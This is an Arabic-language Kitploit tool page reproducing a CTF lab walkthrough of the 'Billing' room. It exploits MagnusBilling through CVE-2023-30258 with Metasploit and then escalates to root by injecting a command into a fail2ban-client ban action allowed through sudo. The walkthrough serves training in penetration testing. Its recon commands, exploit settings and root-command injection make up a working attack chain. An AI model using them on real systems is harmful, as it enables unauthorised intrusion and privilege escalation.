Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Room-Walkthrough-Billing — شرح تفصيلي لاستغلال Billing room باستخدام CVE-2023-30258 وتصعيد الصلاحيات عبر سوء تهيئة fail2ban | Kitploit
أدوات/GitHubGitHub/adityabhatt3010/room-walkthrough-billing
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubadityabhatt3010/room-walkthrough-billing

Room-Walkthrough-Billing

شرح تفصيلي لاستغلال Billing room باستخدام CVE-2023-30258 وتصعيد الصلاحيات عبر سوء تهيئة fail2ban

عرض المستودع
141منذ شهر واحدلم تتم المراجعة بعد

🧠 تجول الغرفة: Billing

كتب بواسطة: Aditya Bhatt | مساهم مفتوح المصدر


📦 نظرة عامة

في هذا التجول، نتعمق بالكامل في غرفة Billing، ونعرض مثيل MagnusBilling ضعيف، وثغرة RCE بدون مصادقة (CVE-2023-30258) مثيرة للاهتمام، وخطأ في تكوين sudo لـ fail2ban يصرخ "ارفع صلاحياتي".

تجمع هذه الغرفة بشكل جميل بين الاستغلال الآلي ورفع الصلاحيات الإبداعي، مما يمنحنا تذوقًا عمليًا للعيوب الواقعية المخبأة في برامج الفوترة الصوتية عبر IP. سننتقل من الاستطلاع الأولي إلى قشرة الجذر مع PoC كامل، وتعليقات، وأجواء 🗿.


🌐 الخطوة 1: مرحلة التعداد

🏁 البداية

بعد نشر الآلة، أول ما يصدمك مثل جدار حماية خاطئ التكوين:

root@kitploit:~
http://<machine_IP>/mbilling/

هذه هي صفحة تسجيل الدخول لـ MagnusBilling. هذا وحده يجر الأجراس — تعلم أنك في مواجهة مسرحية CVE ممتعة.

الموقع


🔍 استطلاع عميق بـ Nmap + Gobuster

نبدأ بمجموعة الاستطلاع النهائية:

root@kitploit:~
nmap -A -sV -p- 10.10.115.173

🧠 النتائج:

  • المنفذ 5038 – Asterisk Call Manager/2.10.6
  • خدمات HTTP أخرى متاحة تحت /mbilling/

بعد ذلك، نستخدم Gobuster بالقوة العمياء:

root@kitploit:~
gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt

🧠 النتائج:

  • robots.txt

روبوتات

🏗️ robots.txt

ثم نتحقق من robots.txt في الموقع بحثًا عن أي شيء حار:

root@kitploit:~
User-agent: *
Disallow: /mbilling/
*

همم… محاولة إخفائه تجعلنا نريده أكثر 😈

<img width="876" height="184" alt="روبوتات" src="https://assets.kitploit.com/production/public/readmes/14999/e9e4c32772fbdbe36fdc96803ff83d819f6f9e5ba7c8760729ac3362b0368f56.png" />  <br/>

---

## 🔌 الخطوة 2: الاستغلال

### 🔥 المنفذ 5038 – Asterisk Manager

اختبار سريع بـ netcat يؤكد أنه يستجيب بـ:

Response: Error Message: Missing action in request *

وهذا يؤكد أيضًا: أن الخلفية هي MagnusBilling، والمنفذ مرتبط بـ Asterisk Call Manager. حان الوقت لاستحضار فنانينا المظلمين 🧙

5038


⚔️ سلاح الاختيار: CVE-2023-30258

استغلال: تنفيذ أوامر عن بعد بدون مصادقة في MagnusBilling الوحدة: `exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258*

شغل Metasploit:

root@kitploit:~
msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

msf_1

ثم تحقق من المتطلبات:

root@kitploit:~
show options

msf_2

ثم قم بتعيين التالي:

root@kitploit:~
set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run

msf_3
msf_4

بعد بضع ثوانٍ… بوم. حصلنا على جلسة Meterpreter!

root@kitploit:~
shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64
*

حاولت فتح قشرة TTY:

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'

msf_5_1


🧭 الخطوة 3: تعداد المستخدم

نبدأ بالتجول لأعلى باستخدام:

root@kitploit:~
cd ..
cd ..

msf_5_2

حتى نجد:

root@kitploit:~
cd /home/magnus
cat user.txt

msf_6

جميل! لكننا لم ننتهِ بعد. نحتاج الجذر، وماغنوس يهمس لنا بالأسرار.


🧨 الخطوة 4: رفع الصلاحيات

لنتحقق مما يمكننا تشغيله بـ sudo:

root@kitploit:~
sudo -l
*

**النتيجة:**

(ALL) NOPASSWD: /usr/bin/fail2ban-client *

الآن هذا 🔥. يمكننا إساءة استخدام fail2ban-client لتنفيذ أوامر كـ الجذر باستخدام إجراءات الحظر.


🎯 إساءة استخدام Fail2Ban → قشرة جذر

لنعد تشغيل fail2ban:

root@kitploit:~
sudo /usr/bin/fail2ban-client restart
*

ثم حقن الأمر لسرقة علم الجذر:

```bash
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"
*

أطلق الحظر (وبالتالي الأمر):

```bash
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1
*

ثم:

```bash
cat /tmp/root.txt

msf_7

تم الاختراق. مثل. رئيس. 🗿🔥


✅ جدول الملخص النهائي


🧠 ما تعلمته (أي الحكمة شبه المحترفة)

  1. 🔍 الاستطلاع ليس مجرد مسح – ابحث عن الصفحات المخفية، تحقق من robots.txt، واغص في المنافذ الغريبة.
  2. 💣 استغلال CVEs المعروفة – كان MagnusBilling عرضة لاستغلال عام (CVE-2023-30258).
  3. 🔓 رفع الصلاحيات لا يعني دائمًا استغلال النواة – حقوق sudo الخاطئة (مثل على fail2ban-client) خطيرة بنفس القدر.
  4. ⚙️ الإبداع مهم – تجاوز قيود المستخدم باستخدام إجراءات الحظر يُظهر تفكيرًا جانبيًا في العالم الحقيقي.

🗿 الكلمات الأخيرة

كانت هذه الحزمة توازنًا جميلاً بين الاستغلال الآلي والإبداع في استغلال ما بعد الاختراق اليدوي. من RCE في MagnusBilling إلى اختراق الجذر عبر fail2ban، تضرب جميع النغمات الصحيحة لقائمة تشغيل المختبر الاختراقي 🎧🎯

سواء كنت مبتدئًا تتطلع إلى التقدم أو محاربًا متمرسًا يجمع الأعلام — هذه واحدة يجب اختراقها.

حتى المرة القادمة، ابقَ خطرًا. ابقَ فضوليًا. ابقَ مهيبًا. 🗿


تنزيل الأداة
🔎 المرحلة💥 الإجراء/الأداة المستخدمة
الوصول الأولياكتشاف بوابة /mbilling والمنفذ 5038 باستخدام Nmap + Gobuster
اكتشاف الاستطلاعنظام MagnusBilling CMS + Asterisk Call Manager
الاستغلالCVE-2023-30258 عبر Metasploit → قشرة Meterpreter
التعدادتحديد موقع /home/magnus/user.txt
رفع الصلاحياتإساءة استخدام fail2ban-client sudo NOPASSWD → RCE كجذر
علم الجذراسترجاع /root/root.txt عبر حقن حمولة fail2ban